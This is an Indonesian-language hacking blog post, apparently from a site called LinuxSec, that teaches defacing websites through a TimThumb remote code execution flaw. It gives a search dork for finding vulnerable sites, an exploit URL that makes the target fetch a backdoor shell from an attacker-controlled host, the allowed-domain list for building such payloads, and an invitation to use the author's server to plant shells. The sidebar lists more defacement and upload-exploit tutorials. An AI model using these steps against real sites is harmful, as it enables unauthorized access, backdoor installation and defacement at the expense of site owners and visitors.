• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Deface dengan Metode Timthumb Remote Code Execution

April 25, 2018 by Jack Wilder 1 Comment

Deface dengan Metode Timthumb Remote Code Execution. Exploit ini sudah ada sejak lama. Mungkin 2010 an. Namun sampai sekarang masih banyak website yang vuln. Bisa dibilang old but gold.

Untuk exploitnya sendiri rata rata hanya bisa digunakan untuk timthumb versi 1.x. Jadi memang harus pandai pandai racik dork nya.

Dork: inurl:timthumb.php?src=

Silahkan dikembangkan.

Exploit: src=http://flickr.com.zafkiel.net/handler.php

Kalian boleh menggunakan web saya untuk get backdoornya. Atau jika punya web sendiri juga bisa.

Contoh website yang vuln:

 

Langsung saja ditempel exploitnya:

  • http://webtarget.com/timthumb.php?src=http://flickr.com.zafkiel.net/handler.php

Jika outputnya seperti ini berarti berhasil.

Tinggal diakses saja shell nya. Intuk path shellnya tertera di pesan error.

Jika masih bingung, berikut videonya:

Untuk membuat payload sendiri, subdomain yang dapat digunakan adalah berikut:

	'flickr.com',
	'picasa.com',
	'blogger.com',
	'wordpress.com',
	'img.youtube.com',
	'upload.wikimedia.org',
	'photobucket.com',

Sekedar informasi tambahan, di tutorial ini saya menggunakan shell Marijuana.

Shares

Filed Under: Tutorial Deface, Web Hacking

Reader Interactions

Comments

  1. Tukang Koment says

    July 30, 2019 at 3:51 am

    emang remote p iyhh??
    bkannya Remote File Inclusion yahh?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Cara Deface Website dengan Teknik Local File Inclusion

Exploit WordPress Ajax Load More PHP Upload Vulnerability

GitHub Custom Domain or Subdomain Takeover

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

FastMail Custom Domain or Subdomain Takeover

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Uptimerobot.com Custom Domain or Subdomain Takeover

WordPress Army Knife CSRF File Upload Vulnerability

MIME Type Sniffing pada Form Upload Gambar

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Powered by WordPress and Genesis Framework. Style by LinuxSec.